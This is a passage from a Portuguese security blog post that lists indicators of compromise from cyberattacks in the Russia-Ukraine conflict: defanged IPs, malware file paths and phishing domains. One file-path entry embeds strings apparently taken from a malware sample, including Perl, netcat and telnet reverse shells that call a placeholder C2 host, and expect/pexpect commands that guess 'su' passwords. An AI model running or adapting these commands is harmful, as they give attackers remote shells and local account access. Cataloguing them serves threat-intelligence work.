5[.]181.80.132
5[.]252.118.19
5[.]255.99.205
5[.]45.73.243
62[.]102.148.68
62[.]182.84.146
77[.]48.28.204
77[.]48.28.236
79[.]137.194.146
80[.]67.167.81
82[.]221.128.191
84[.]239.46.144
89[.]147.111.106
89[.]248.165.181
91[.]208.75.153
91[.]208.75.3
91[.]224.92.110
94[.]102.51.15
95[.]214.234.139
95[.]214.55.43

Sistema operacional:

/lib/libc.so.7
/lib/x86_64-linux-gnu/libs.so
/lib/x86_64-linux-gnu/security/pam_unix.so
/tmp/.1
/usr/sbin/wccrt
/usr/sbin/wcc
/var/lib/vim‍/ps
/var/lib/vim‍/vfth/scan.sh expect -c 'spawn su -c "whoami" "%user%"; expect -re "assword"; send "%password%"; expect eof;' 2>&1 perl -e 'use Socket;$i="%C2IP%";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 2>&1 python -c 'import pexpect as p,sys;c=p.spawn("su %user% -c whoami");c.expect(".*assword:");c.sendline("r3b3iFv4r3b3iFv4");i=c.expect([p.EOF,p.TIMEOUT]);sys.stdout.write(c.before[3:] if i!=p.TIMEOUT else "")' 2>&1 sleep 1; nc -e /bin/sh %C2IP% 3333 2>&1 sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet %C2IP% 3333 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe 2>&1
/bin/false
/bin/nologin
/usr/sbin/cron

OBS: O malware que eu identifiquei acima como Winter Vivern na verdade não teve um nome específico report original do CERT-UA. Por isso, optei por identificar esse caso com o nome do grupo responsável pelo ataque. Idem para o caso da 'Campanha "Cloaked Ursa"', que não recebeu um nome específico do pessoal da Unit-42.

Segundo a Secureworks, os domínios abaixo foram usados para ataques de phishing reportados pelo CERT da Ucrânia em 25/02:

ua-passport[.]space
bigmir[.]space
mirrohost[.]space
mil-gov[.]space
verify-email[.]space
verify-mail[.]space
creditals-email[.]space
meta-ua[.]space
i-ua[.]space
kontrola-poczty[.]space
walidacja-poczty[.]space
weryfikacja-poczty[.]space
konto-verify[.]space
weryfikacja-konta[.]space
walidacja-uzytkownika[.]space
akademia-mil[.]space
ron-mil[.]space

Para saber mais:

Ukraine Network IOCs July 20 2022 (Pastebin.com) (github) (Fonte: USCYBERCOM Cybersecurity Alert)

Russian state hackers lure Western diplomats with BMW car ads

PS: Post atualizado em 11/04, 30/08, 30/09, 19/10 e 09/11. Atualizado novamente em 07 e 20/12. Ano novo e o conflito continua, infelizmente. Post atualizado em 09 e 12/01/2023. Atualizado em 13/04, 08/05, 26/06 e 11+14/07. Atualizado em 03/08, 02/10, 30/11 e 22+29/12. Atualizado em 16/01/2024.

PS/2: Na tentativa de evitar que esse post continue sendo suspenso pelo blogger acusado de desrespeitar a política de conteúdo sobre Malware e Vírus, eu revisei todos os IOCs para garantir que os endereços de domínios e IPs fossem parcialmente obfuscados usando colchetes ([ e ]), como é padrão da indústria. (26/06/23)

Nenhum comentário:

Postar um comentário

AnchisesLandia- Brazilian Security Blogger

Páginas

abril 07, 2022

[Segurança] Indicadores dos ciber ataques durante o conflito entre a Russia e Ucrânia

Nenhum comentário:

Translate